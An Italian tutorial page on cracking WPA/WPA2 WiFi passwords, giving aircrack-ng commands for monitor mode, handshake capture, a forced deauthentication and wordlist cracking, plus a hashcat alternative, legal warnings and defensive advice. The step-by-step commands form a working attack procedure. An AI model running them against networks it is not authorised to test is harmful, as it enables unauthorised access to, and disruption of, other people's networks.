Home › Rete & Wireless › WiFi Cracking
WiFi Cracking (WPA/WPA2)
Catturare l'handshake WPA2 e craccarlo offline con una wordlist. Solo sulla TUA rete.
Legge. Testare una rete WiFi che non è tua (vicino, bar, ufficio) è accesso abusivo ed è reato. Fai questo esclusivamente sul tuo router/access point o in lab dedicati.
Teoria: il 4-way handshake
Quando un dispositivo si connette a una rete WPA2, scambia col router un 4-way handshake: 4 messaggi che provano la conoscenza della password senza inviarla in chiaro. Se catturi questo handshake, puoi provare offline miliardi di password: per ognuna calcoli cosa dovrebbe produrre l'handshake e confronti. Se combacia → password trovata.
Serve una scheda WiFi che supporti la monitor mode e l'injection (molte interne dei laptop no; le chiavette Alfa sì).
Procedura completa (aircrack-ng)
Questi sono i comandi passo-passo. wlan0 è la tua scheda; CANALE e TUO_BSSID li leggi al passo 2.
0. Salva i file sul Desktop
cd ~/Desktop
1. Metti la scheda in monitor mode
sudo airmon-ng check kill # chiude i processi che disturbano
sudo airmon-ng start wlan0 # crea l'interfaccia wlan0mon
2. Trova la tua rete
sudo airodump-ng wlan0mon
# premi Ctrl+C quando vedi il tuo BSSID e il suo CANALE
3. Ascolta la tua rete e salva la cattura
sudo airodump-ng -c CANALE --bssid TUO_BSSID -w cattura wlan0mon
# lascia questo terminale aperto, in attesa dell'handshake
4. (In un NUOVO terminale) forza il deauth per catturare l'handshake
sudo aireplay-ng --deauth 5 -a TUO_BSSID wlan0mon
# disconnette brevemente un TUO dispositivo: al riconnettersi rifà l'handshake
# nel terminale del passo 3 apparirà "WPA handshake: TUO_BSSID"
5. Cracking con la wordlist
# scompatta rockyou se non l'hai già fatto:
sudo gunzip /usr/share/wordlists/rockyou.txt.gz
sudo aircrack-ng ~/Desktop/cattura-01.cap -w /usr/share/wordlists/rockyou.txt
# se la password è nella wordlist → "KEY FOUND! [ password ]"
6. Ripristina la scheda
sudo airmon-ng stop wlan0mon
sudo systemctl restart NetworkManager
In alternativa puoi craccare l'handshake con hashcat -m 22000 (molto più veloce con GPU): converti il
.cap con hcxpcapngtool. Vedi Attacchi password.Difesa
- Password WiFi lunga e casuale (12+ caratteri): rende inutile la wordlist.
- WPA3 dove possibile (SAE resiste al brute force offline).
- Disattiva WPS (vulnerabile a Pixie Dust / brute PIN).
Lab / pratica autorizzata
THMWifi Hacking 101FacileTeoria e pratica del cracking WPA in ambiente guidato. WEBWiFi Challenge LabVarioLab dedicato al WiFi hacking senza bisogno di hardware tuo.Il modo più sicuro e legale di allenarti: il tuo router di casa, o un vecchio access point comprato apposta.
Sui tuoi libri: Hacking Wireless Networks for Dummies, Wireless Network Security, Offensive Security – Wireless Attacks (WiFu). Vedi Risorse.